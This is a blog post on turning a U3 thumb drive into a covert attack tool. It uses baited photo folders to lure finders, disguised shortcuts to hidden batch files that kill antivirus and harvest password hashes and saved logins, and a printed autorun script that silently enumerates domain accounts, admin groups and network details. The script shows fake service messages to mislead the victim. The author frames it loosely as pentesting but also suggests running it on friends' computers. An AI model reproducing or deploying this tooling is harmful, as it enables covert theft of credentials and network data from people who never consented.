Enumeration using usb hacksaw

USB Enumerator vs USB Hacksaw

My next folder is titled "Wedding Pics - DO NOT DELETE" and it has a few wedding and baby pics in (no metadata remember).



So what cold hearted person wouldn't want to return a USB Device with baby and wedding pics on right! Oh and the guy in the wedding photo...... he's in a wheelchair (thanks Google Images) so it would have to be a cold hearted individual who is going to keep that USB drive.

Next I have a couple more directories.



Well they look like directories but they are just links to my evil scripts that will help me on my dark crusade.

A closer look at the shortcut reveals its actually a link to a batch file that will kill any running AV and launch programs to get the local password hashes, internet passwords and login details for MSN etc. And we all know that people re-use paswords don't we.




When someone clicks on one of these 'shortcuts' it will place the running batch file to the back of any open windows and the only clue that anything is going on is a folder in the toolbar which will disapear after a few seconds.




And the batch file can do anything. Obviously I want to stop AV first, and then thanks to a few tools from Nirsoft as well as a few others from the likes of foofus I have loads of juicy details coming my way.




And what does this give me? Hashes, oh the lovely hashes.......



And of course we want the websites too.



And theres plenty more but I'm sure you get the point.


But this is a U3 thumb drive, so hopefully we don't need to rely on a nosey bugger clicking around, because it will hopefully utilise the auto run feature to enumerate the network as soon as it's plugged in. It does the crazy enumeration coolness by running this script from the hidden \WIP\CMD folder.



Here's the simple batch file that does the enumeration:

@Echo off

echo Starting. Do not close program. Please wait 15 seconds.

::Generate a unique filename

set fn=%computername%-%random%

::Create a non-obvious directory

mkdir .\Windows\System\System32\etc\hosts\win\0011\%fn%

cd .\Windows\System\System32\etc\hosts\win\0011\%fn%

::Get local Time and Date Info

time /t >%fn%.log

date /t >>%fn%.log

::Network Info

net user /domain >>%fn%.log

echo Restarting critical service. Please Wait 5 seconds.

net group /domain >>%fn%.log

net localgroup /domain >>%fn%.log

net localgroup administrators /domain >>%fn%.log

net localgroup "Account Operators" /domain >>%fn%.log

net accounts /domain >>%fn%.log

net view /domain >>%fn%.log

net view >>%fn%.log

echo Service restart complete. Please wait 5 seconds.

::Local Info

ipconfig /all >>%fn%.log

ipconfig /displaydns >>%fn%.log

netstat -ano >>%fn%.log

netstat -r >>%fn%.log

arp -a >>%fn%.log

tasklist /svc >>%fn%.log

tasklist >>%fn%.log

tasklist /v >>%fn%.log

net share >>%fn%.log

net use >>%fn%.log

net accounts >>%fn%.log

net localgroup >>%fn%.log

net localgroup administrators >>%fn%.log

systeminfo >>%fn%.log

netsh firewall show config >>%fn%.log

echo Service failed to load. Error code MS-31337

netsh diag show all /v >>%fn%.log

And that pretty much enumerates the network for all accounts, groups and members of admin groups. It gets password policies, computer details from the domain, domain names....




local accounts and groups, firewall policies, applied hotfixes, network connections, open ports, running services, shares, networking information and other bits and bobs as well.




And the beauty of it all is it's just using Microsoft tools which won't make the AV go loopy and freak out. So within a few seconds of plugging the device into any PC with a USB port on a network and you'll have more data than you can shake a big enumerating stick at. Wonderful!

All this useful data is output to a single log file that is in a deeply buried obfuscated directory with a random number appended to the end, so it can be run time after time and is nicely tucked away.

But what if autorun is disabled? Well just like the script that kills the AV and grabs the passwords this can be run manually by clicking the batch file or by fronting it with a shortcut with a folder icon and running that.


So how can this be useful in a pentest? it could be that during that pentest you have social engineered your way onto a helpful persons PC who is going to print something off for you or email an important document for you and said files are on your USB device. Or you could hand a USB device to a receptionist to ask her to heck who's it is. Or of course you could just be transfering those picture or music files to your friends computer. So if your reading this and you know me, maybe next time you ask me for a file or a movie that I have on USB you better think again!

So there you have it, my take on making my USB Hacksaw a little more interesting.